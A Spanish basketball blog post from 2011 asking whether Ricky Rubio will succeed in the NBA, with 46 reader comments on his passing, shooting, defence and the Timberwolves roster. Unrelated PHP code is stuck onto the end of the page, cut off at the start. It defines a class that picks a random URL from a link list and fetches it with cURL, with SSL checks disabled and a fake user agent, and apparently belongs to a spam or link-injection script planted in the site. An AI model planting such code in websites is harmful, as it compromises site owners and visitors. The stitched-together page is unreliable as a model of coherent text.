La pregunta

21 de November de 2011 por txusma

“¿Triunfará Ricky Rubio en la NBA?”

Comenta

46 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Yo creo que si, los defectos de Ricky son mejorables con práctica y allí va a mejorar físicamente seguro, es un gran defensor y base organizador, además tiene caracter y le darán muchos minutos desde el principio.

    Me mojo un poco mas y digo que antes de tener que renovar su contrato es All-Star.

      Citar

  2. Jose Luis dice:
    #2

    Pues creo que deberíamos definir que entendemos como triunfar; ¿jugar 30 minutos por partido? ¿jugar 35? ¿jugar los minutos clave? ¿llegar al All-Star?

    Yo creo que Ricky puede llegar a triunfar, ser titular en un equipo y jugar sus 30 minutos por partido, lo de llegar a un All-Star… lo veo más complicado, aunque puede ser. Sus defectos se pueden mejorar con la práctica como dice Viva_Dirk, pero no creo que como para llegar a All-Star, con todos los bases jovenes, fuertes y atléticos que salen en la NBA cada año.

      Citar

  3. dsromero dice:
    #3

    Yo estoy convencido de que triunfará, su juego a campo abierto es fantástico y las reglas NBA le pueden favorecer.
    Sin olvidar lo joven que sigue siendo, que está en un equipo que va a apostar fuerte por el (lo más complicado para un europeo) y que no tiene urgencias.

    No se si llegará a ser All-Star (menos aún en los 4 años de su contrato rookie) pero lo que está claro es que puede ser un jugador importante en cualquier equipo que quiera defender fuerte y jugar rápido. En la NBA se puede ir a las 10 o 12 asistencias por partido con bastante facilidad.

      Citar

  4. JHC dice:
    #4

    eaa pues llega el primero que no confía en el, lo veo de lo mas parecido a Sergio… muy buen organizador pero pésimo en ataque, en defensa es donde si consigue hacerlo bien podrá llegar a ser algo pero tengo mis dudas.

      Citar

  5. HisRoyalAirness dice:
    #5

    He dicho aquí por activa y por pasiva que no tengo ninguna duda de que va a triunfar. Y mi razonamiento es exacto al de Dirk.
    Tiene TODO lo que les falta a los rookies: defensa, experiencia, generosidad y visión de juego. El tiro se mejora y no es un mal tirador, es todo cabeza.
    creo que sí va a llegar a ser All-Star y una de las razones por las que más me jode que no esté habiendo liga es porque tenía muchísimas ganas de verle debutar.
    Y añado, creo que ya el primer año va a estar en el top 10 de asistencias y robos

      Citar

  6. otropablo dice:
    #6

    Depende de él (y de Rick Adelman), si se divierte y deja salir su genio puede que se sorprendan hasta en la nba. Si se vuelve rígido pues pasará como con Sergio, que volvió como un corderillo…
    Yo le deseo la mejor suerte!

      Citar

  7. Sancho88 dice:
    #7

    De entrada, tiene el beneficio de la duda. No le hemos visto todavía jugar a ese nivel, ni saber si dará un salto cualitativo en su defensa y lanzamiento. Por otra parte, tiene el deber de superar lo que han hecho los otros bases españoles en la NBA, por orden de protagonismo: Calderón, Sergio Rodríguez y Raúl López. Tiene ese deber porque con 20 años ha jugado una final olímpica, lleva 6 años en la élite y su previsión y alto puesto en el draft así lo exigen. A partir de ahí, todo depende de él. Entrará en un mercado muy reducido, el de Minnessotta, que lleva siendo un desierto desde la marcha de Kevin Garnett. En ese sentido tiene muchas similitudes con el comienzo de Pau en Memphis, así que puede ser complicado que un gran equipo como Lakers o Celtics apuesten por él en un futuro cercano. Lo que está claro es que su primer objetivo -si lo queréis llamar triunfar, pues lo llamaremos triunfar-, su primer objetivo esta temporada es buscar ser el rookie del año, o por lo menos entrar en el quinteto de rookies, viendo que habrá jugadores como Kemba Walker, Kyle Irving, Derrick Williams, etc., no es del todo imposible si Ricky está a la altura de lo que todos esperamos de él. No hay Lebrons James, ni Kevint Durants. Por lo menos debe luchar por nominaciones a mejor debutante de algún mes. Me parece que tiene un buen socio en Kevin Love, un jugador atípico para los tiempos que corren en esa liga. Conoce el juego y explota sus carencias físicas al máximo. Veremos si otros como Wes Johnson y Beasley se implican y podemos ver a los Wolves por encima de las 20 victorias. Lo veo difícil, pero no imposible. Lo que sí tengo claro es que por el estilo de Ricky, algo sí que se le debe exigir sí o sí: que ofrezca todo el espectáculo que tiene dentro y que promedie cerca de 10 asistencias NBA. Yo creo que eso no es descabellado para él, como los robos y demás. Para mí la incognita será esa, ¿puede mejorar exponencialmente su físico -que de por sí no es malo-, su defensa y su tiro sin que se vean perjudicadas sus cualidades de espectáculo? Veremos.

      Citar

  8. Esteban dice:
    #8

    creo q ricky hara una buena campaña NBA, cuando digo buena, es ser base titular por 4 o 5 años, estilo calderon, tener alguna temporada de 10 asistencias, jugar algunos play offs como base titular pero no mucho mas
    quiza hasta una gran renovacion, creo que hara la misma campaña que calderon

    el tema es ver a donde apuntaba ricky hace 4 años, de ser el fijo numero 1 del draft, jugador franquicia, y estrella mundial, a terminado por ser suplente en el barsa, jugara en lso wolves, el peor equipo de la nba, no sera jugador franquicia y nisiquiera se sabe si sera titular

    por mejor q lo haga, creo q nunca llegara a ser tan bueno como se esperaba de el y eso lo marcara de por vida

      Citar

  9. laker16 dice:
    #9

    Yo digo que no hara mucho mas que Raul Lopez o Sergio Rodriguez

      Citar

  10. melo15 dice:
    #10

    yo no entiendo mucho porque ricky no me gusta mucho pero eso que decis que es un gran defensor bueno lo es pero a nivel ACB porque ya veremos como lo ara contra bases como paul rose o incluso wall curry de su misma edad es mui buen pasador i eso pero tirando es un desastre i no creo que llegue a los 10 puntos por partido( no lo a echo en la ACB) ni al segundo quinteto de rookies con bases como irving knight walker …. ni en broma

      Citar

  11. Txusma dice:
    #11

    A Ricky le veo ya este primer año cerca de las 8 asistencias por partido. Si en la ACB ha sido capaz de promediar más de 4 que hará en una liga donde hay muchas más posesiones y casi regalan esa estadística? El tema de la anotación lo tendrá que trabajar. Creo que en los primeros partidos no se va a atrever ni a entrar así que tendrá q vivir de lo que meta cuando esté solo.
    Apuesto por unas estadísticas de 4 puntos, 8 asistencias y robo por partido. Para mi, eso sería una primera año excelente pero no sé si le valdrá para acabar en el primer qinteto de rookies. Ah! Y saldrá bastante en las mejores jugadas del día, ya veréis.

      Citar

  12. Esteban dice:
    #12

    muchachos, si rubio no llega a los 10 puntos de promedio y 6 asistencias, sera una fracaso rotundo, TOTAL

    no nos olvidemos que es un numero 5 del draft, no estuvo mas arriba por lo dificil de su salida, llega a la nba desp de un par de años donde supuestmente a madurado

    creo q el propio kemba walker, va a promediar 10 puntos y 6 asitencias por partido, y es un numero 9 del draf, recien salido de la universidad, y no ha tenido el tiempo de maduracion a nivel profesional que ricky tiene hace muchos muchos años

    si rubio no llega a esos promedios, dificilmente siga en la nba por mucho tiempo, mas que calderon se parecera mas a raul lopez y rodriguez

      Citar

  13. TheDeerHunter dice:
    #13

    A mí me parece que por características está casi mejor posicionado para la NBA que para la ACB.
    No lo veo all-star, pero sí le veo posibilidades de ganarse un gran contrato y hacer carrera en la liga.
    Lo malo es que depende mucho de lo que apuesten por él otros y lo que quieran invertir en formación específica. La mayor parte de las cualidades estadísticas las tiene más que la inmensa mayoría de rookies de su promoción.

      Citar

  14. Sancho88 dice:
    #14

    melo15:
    yo no entiendo mucho porque ricky no me gusta mucho pero eso que decis que es un gran defensor bueno lo es pero a nivel ACB porque ya veremos como lo ara contra bases como paul rose o incluso wallcurry de su misma edad es mui buen pasador i eso pero tirando es un desastre i no creo que llegue a los 10 puntos por partido( no lo a echo en la ACB) ni al segundo quinteto de rookies con bases como irving knight walker …. ni en broma

    Puede ser lo que tú dices, pero si miras el nivel NCAA en los últimos años, no voy a decir que venden humo deliberadamente, pero este año si no llega a ser por la bestia Griffin, eso habría sido un engaño de promoción. John Wall creo que a estas horas sigue corriendo por delante del balón, algún día batirá el record de los 100 metros lisos, y Cousins y su cabecita… qué decir del grandullón de los Kings? Por eso, yo no voy a endiosar a ningún chiquillo de aquella liga hasta que lo demuestre en la NBA. Ni Walker, ni Irving, ni Knight ni nadie tienen la experiencia de Ricky Rubio. Va mucho más maduro que ellos, ha ganado la Euroliga, dos Eurobaskets… es un jugador hecho, pero con la misma edad que esos que tú comentas. Por tanto, creo que va a tener mejor adaptación allí y vamos, que estará en el primer qiunteto… eso fijo. La NBA ya sabes que puede meter a Duncan de ‘3’ y a Ricky Rubio de ‘3’ también, jejee. Bueno, esto es exagerado ok? pero vamos, que si se trata de hacer quintetos no tienen ningún problema en meter a dos bases, un base escolta y un alero, por ejemplo. Ya sabemos como funciona eso. Pau de alero para elegir en el All Star… creo que queda todo dicho acerca de la organización de posiciones en esa liga. Y sí, hay que exigirle cerca del 10-10-5 (en puntos, asistencias y robos). Todo lo demás sería un fracaso.

      Citar

  15. Sancho88 dice:
    #15

    Por Blake Griffin, que no era de esa promoción, evidentemente

      Citar

  16. Viva_Dirk dice:
    #16

    Joder Txus, 4 puntos y 8 asistencias es una basura, vamos que creo que ningun base titular promedia 4 puntos, Mario Chalmers ha metido 6.4 por decir uno.

    Ricky si juega entre 32-36 minutos tiene que estar cerca del doble-doble, 8-8 y un par de robos si serían números aceptables.

      Citar

  17. Viva_Dirk dice:
    #17

    Pero Sancho, ¿¿5 robos por partido??, si no hay nadie en la historia de la NBA que promedie 3.

      Citar

  18. Esteban dice:
    #18

    lo de ricky tamb dependera de que haga su equipo

    los wolves deberan mover piezas y muchas

    son el peor equipo de la nba, y sus mejores jugadores juegan todos de lo mismo, wes jhonson, derrick williams, y beasley son aleros, y los dos ultimos pueden jugar de ala pivote, posicion donde tienen a love

    tienen muchos jugadores, jovenes y mucho espacio en el tope, deberian hacer traspasos, asumir contratos altos como granger o ellis a cambio de sus jovenes y ahi ser un escenario propicio para que ricky se desarrolle y principalmente q love no presione para irse en los proximos años

      Citar

  19. javiviver dice:
    #19

    Ricky como no mejore el tiro va a ser un calderon pero nada mas
    Kyrie irving kemba walker i knight se van a ir a los 10 puntos o mas seguro i. Sus equipos van a ir mejor que los t -wolves seguro i ricky va a tener que compensar con muchos asistencias
    Y no ablemos de wall porque tiene un potencial brutal no comparable con el de ricky i cousins igual

      Citar

  20. javiviver dice:
    #20

    Ademas ricky en la euroliga esta no izo nada
    Jennings curry evans no me los compares por favor

      Citar

  21. melo15 dice:
    #21

    Tiene experiencia en la ACB porque en la NBA no ricky se anotase un poco mas seria mui bueno pero su tiro es inaceptable

      Citar

  22. Viva_Dirk dice:
    #22

    Con Jennings ciertamente no lo podemos comparar, hay que recordar que Brandon era el tercer base de la Lotomatica de Roma.

      Citar

  23. Esteban dice:
    #23

    creo que lo que dice viva_dirk hay que tenerlo muy en cuenta, jennings, en italia promediaba 5 puntos y el año siguiente paso a 15 en la nba,

    hay jugadores para la nba y otros q no, pero OJO, jennings cuando fue a italia tenia 17 años, recien salido de la secundaria (!!!!!!!!!) por sus promedios para entrar en la NCAA

    ricky no sera un tirador, NUNCA, pero su velocidad y el estilo de la nba puiede llevarlo a penetrar mucho y terminar con algunas buenas volcadas

      Citar

  24. Esteban dice:
    #24

    aunque debo decir, que ricky hasta tiro feo sus bandejas ejeje

      Citar

  25. telekoman dice:
    #25

    Yo creo que a Ricky esta primera temporada (si empieza) le va a marcar muchísimo los primeros partidos que realice. Si consigue que sus actuaciones sean buenas en los 4 ó 5 primeros, su cabecita, que le controla mucho más de lo que parece, le va a permitir dar el pequeño salto en anotación que necesita para empezar a ser “respetado y admirado”. Ahora bien, como esos partidos no le salgan bien, fallando tiros fáciles, teniendo pocos minutos, etc, su cabecita le va a hundir de la misma forma que le pasó en el Barsa la temporada pasada. Y veremos entonces que es lo que pasa.

    Yo espero que tenga suerte, pero lo tiene complicado, me temo.

      Citar

  26. melo15 dice:
    #26

    Que no sea bueno tirando de tres no pasa nada(en sus primeras temporadas) i si no mirar a DeRozan pero como va tirando de media distancia

      Citar

  27. melo15 dice:
    #27

    Eso es verdad tienen 3 jugadores en la misma posicion i no pude ser wes beasley a la calle por 4 o 5 jugadore buenillos si consiguen acerlo OJO porque los wolves tendrian equipa
    Ricy no le va a pasar nada si no tira de 3(en un par de años) i si no mirar a DeRozan que es completamente nulo
    Pero como le va tirando de media??

      Citar

  28. Nacho dice:
    #28

    Ricky tiene algo que no tienen la mayoría de los bases jóvenes NBA (por no decir todos). Tiene una comprensión del juego total (de equipo me refiero) que ni Rose, ni Jennings, ni por supueso Westbrook tienen. Ellos explotan muy bien el unoxuno, el pick y continuación, y doblar el balón (aparte de anotar), pero no conciben el pase para convertirlo en extra pass, (claro, no sale en las estadísticas), por poner un ejemplo.
    Yo no he visto a nadie tan joven con un concepto del juego colectivo propio del base europeo, más el espectáculo puro NBA. Yo creo que aquí, entrenadores como Xavi Pascual no cuadran muy bien con lo segundo, y veremos si aceptan lo primero allí. De esa premisa, y desde luego de cómo esté su cabeza, depende su triunfo.
    Otra cosa que he echado de menos en los comentarios es su capacidad para el rebote. De hecho, es de los pocos jugadores que como tenga el día tonto puede rozar el cuádruple doble.

      Citar

  29. GreenPride dice:
    #29

    Pues sinceramente era una de las grandes preguntas para los aficionados españoles de esta temporada que no empieza. Yo sinceramente no soy demasiado optimista en cuanto a sus posibilidades y me explico. En ataque tiene que mejorar muchísimo pero no sólo en el tiro como se ha dicho por aquí también a la hora de penetrar. Por poner un ejemplo Rondo es muy mediocre lanzando pero un demonio penetrando y Ricky ni una ni otra. Para conseguir asistencias necesitará ser una amenaza o le flotarán muchísimo. Creo que donde está más preparado es a la hora de defender pero incluso aquí estamos hablando de que era gran defensor en Europa donde el físico de los bases contrarios no era ni parecido al que se va a encontrar ahora.
    Eso sí, aún es joven y tiene potencial como para acabar destacando pero yo creo que le llevará unos años y necesitará la confianza de sus entrenadores para que no lo marginen si no le va muy bien al principio, si no será un calco al caso Sergio Rodríguez.
    En cuanto a estadísticas, todo lo que no sea 10 ptos y 6 asistencias si jugase más de 30 minutos por partido sería una mala primera temporada, ya veremos cómo se le da si es que hay liga

      Citar

  30. infante dice:
    #30

    Mirando el roster de los Wolves para la temporada que viene, en teoría Ricky deberá competir con Jonny Flynn(que me suena que fue traspasado) y con Luke Ridnour. Partiendo de esa base, considero que Ricky tiene un trabajo bastante jorobadillo en mejorar las prestaciones de Ridnour. Vale que no sea la quintaesncia, pero es un base rapido, con un tiro de media-larga distancia mucho mejor que el de Ricky, es un correcto defensor y (para mi lo mas importante) tiene la experiencia suficiente como para saber gestionar los minutos finales de un encuentro. Ricky debera igualar primero y superar despues estas prestaciones para llegar a algo esta temporada

    Y por muchos minutos FIBA que Ricky haya podido jugar, creo que todavia le faltan minutos NBA para llegar a ser titular (porque de suplente no le veo haciendo grandes cosas), y de ahi debe partir para llegar a algo

      Citar

  31. Guisante dice:
    #31

    Pues yo creo que no llegará a ser una de las grandes figuras de la liga, excepto por los highlights de las jornadas en los que seguro caerá alguna de sus asistencias, pero si pienso que se acabará conviertiendo en un base respetable y de larga trayectoria NBA. El salto de ACB a NBA no debe ser mucho menor que desde la Universidad americana, aunque no sigo ni veo ésta última competición por lo que no puedo valorarlo como es debido.
    Sólo como herramienta de márketing tiene un par de años buenos asegurados, no os olvideis que es blanco. (No se tome este comentario por racista, que no lo es). Y si liga bien con Kevin Love ya ni te cuento… y para eso la NBA no se lo piensa. Lo llevan esperando como agua de mayo un par de años, idem con los wolves.

      Citar

  32. Ricky_triunfador dice:
    #32

    Pues claro que no va a triunfar ¿Que tipo de pregunta es esta??

      Citar

  33. melo15 dice:
    #33

    Coincido totalmente con lo que a dicho green pride ricky es mui parecido a rondo pero ricky no tiene esa capacidad de penetrar
    Yo creo definitivamente que ricky puede ser un gran base titular. Y muy respetado pero nada de eso de que va a ser all star ni primeros quintetos de rookies i menos con la cantidad de bases que salen cada año de la NCAA

      Citar

  34. Txusma dice:
    #34

    Viva_Dirk:
    Joder Txus, 4 puntos y 8 asistencias es una basura, vamos que creo que ningun base titular promedia 4 puntos, Mario Chalmers ha metido 6.4 por decir uno.

    Ricky si juega entre 32-36 minutos tiene que estar cerca del doble-doble, 8-8 y un par de robos si serían números aceptables.

    Bueno, es que no tengo tan claro que Ricky vaya a ser titular desde el primer minuto. Como comentan por ahí, superar a Ridnour al principio no va a ser tan fácil. Eso sí, espero que en 10-15 partidos ya esté jugando 30 minutos y como titular.

      Citar

  35. Kiki dice:
    #35

    La clave estará en esta primera temporada (si se disputa, claro).
    Lo bueno para él es el nombre que tiene allí, se le conoce y eso siempre ayuda, en todos los sentidos. También le favorece las características que tiene como jugador. Si eres sobresaliente en algo, tienes parte del camino andado en la NBA. Ricky lo es en varios aspectos, sobre todo defensivos: anticipación, visión de juego defensivo y manos muy rápidas. También destaca mucho para mí en inteligencia y conocimiento del juego. No quiero decir que se convierta en un especialista, sino que todo eso le ayudará sin duda. Debe mejorar sobre todo el desarrollo del tren superior y claramente su tiro.
    Que Adelman sea su entrenador como rookie creo que le vendrá bien. Terry Porter hablaba sobre eso, contando que él mismo lo pasó mal en sus primeros años en Portland precisamente en cuanto al tiro exterior, pero Adelman le ayudó a potenciar sus virtudes y mejorar poco a poco en sus puntos débiles. El estilo del equipo y del entrenador le pueden favorecer, siempre que no se convierta en una “banda” desde el tercer mes, como pasó con Rambis en las dos últimas campañas.

    Yo creo que sí va a “triunfar”, si se entiende como triunfar el tener una buena carrera en la Liga. Que sea titular o no ya no debe ser tan importante.

      Citar

  36. melo15 dice:
    #36

    Para mi triunfar es ser all-star i ricky no lo sera. porque lo que no abeis pensado esque no es lo mismo defender a un base de la ACB a un base de la NBA que son mas fuertes mas rapidos o que les dejas un centimetro de espacio i te clavan un triple no es lo mismo

      Citar

  37. HisRoyalAirness dice:
    #37

    melo15:
    Para mi triunfar es ser all-star i ricky no lo sera. porque lo que no abeis pensado esque no es lo mismo defender a un base de la ACB a un base de la NBA que son mas fuertes mas rapidos o que les dejas un centimetro de espacio i te clavan un triple no es lo mismo

    Mìrate en youtube las defensas de Ricky sobre Chris Paul, Jason Kidd y Derrick Rose ya veràs como te sorprendes. Mira su productividad y el balance de USA cuando les defiende él

      Citar

  38. Blade Petrovic dice:
    #38

    Yo creo qe si porque se pude conpenetrar bien con love.De aqui unos cuantos años lo ficha un equipo grande i si todo sale bien……..
    Ojala triunfe porq es un muy buen base aunqe tiene q mejorar el tiro.
    Podriamos continuar el trivial.Porqe yo tenia una buena pregunta pensada.
    Ahi lo dejo

      Citar

  39. melo15 dice:
    #39

    Si ke tal una pregunta es plan quien se llevara el ROY

      Citar

  40. r_miller dice:
    #40

    aber, una cosa clara, Ricky ace dos años apuntaba a todo si, i emos visto una bajada de calidad muy representativa. Pero no debemos olvidar su juventud. Tiene 20 años i parece qe USA se a fijado en el. Quien sabe si acaba siendo un Hardaway. Kevin Love es un jugador que es impresionante, tiene buen tiro i un buen fisico i a Beasley yo le echaba a patadas a cambio de un pivot decente i algun jugador de banquillo tipo Sasha Vujasich i ponia a Webster de titular. Claro que el banquillo quedaria muy cojo pero bueno. Ricky se creio dios i por eso tuvo ese bajon, creo yo. Puede llegar muy lejos, es joven, tiene mucha calidad i creo que caer en un equiipo malo es un benefiicio para el en un principio, ia qe le daran mucho el balon i no creo qe Ridnour le quite la titularidad. Creo qe no va a ser Rookie del año i dudo en el mejor quinteto i creo qe se vera al mejor Ricky o el proximo año o el siguiente i qe acabara riendose de la carrera de Sergio Rodriguez

      Citar

  41. melo15 dice:
    #41

    Yo creo que los wolves pueden tener equipazo si lo acen bien
    Beasley por un pivo i un jugador de banquillo i les quedaria un equipazo
    Ricky/ridnour
    El webster este
    Wes johnson
    Love
    I el pivot
    I quedaria derrick williams que yo nose donde ponerlo la verdad yo aria un trade

      Citar

  42. LeonVanBon dice:
    #42

    ¡Dios! Me sangran los ojos, entiendo que por economía no se pongan las haches, ¿Pero poner “i” en vez de “y”?
    De verdad que no lo entiendo. Que esto no es (afortunadamente) el foro de Marca.

    Grandes comentarios en contenido, eso sí, gracias 😉

      Citar

  43. melo15 dice:
    #43

    Soi de catalunya

      Citar

  44. Uno cualquiera dice:
    #44

    Eso no te exime de escribir correctamente o al menos intentarlo. Ya no hablo únicamente de faltas ortográficas, sino de aportar una coherencia sintáctica y gramatical a tus comentarios.

    Una de las cosas que diferencia este blog de otros foros y blogs de NBA en español es la calidad de sus comentarios. No dejemos que eso cambie.

    PD: y también soY catalán

      Citar

  45. TheDeerHunter dice:
    #45

    Pues buen debut en la primera pachanga y los americanos encantados.
    Que siga así…

      Citar

  46. melo15 dice:
    #46

    Ha jugado bien ricky ahora me conecto al ordenador y haber que tal. Visteis ayer a irving 21

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>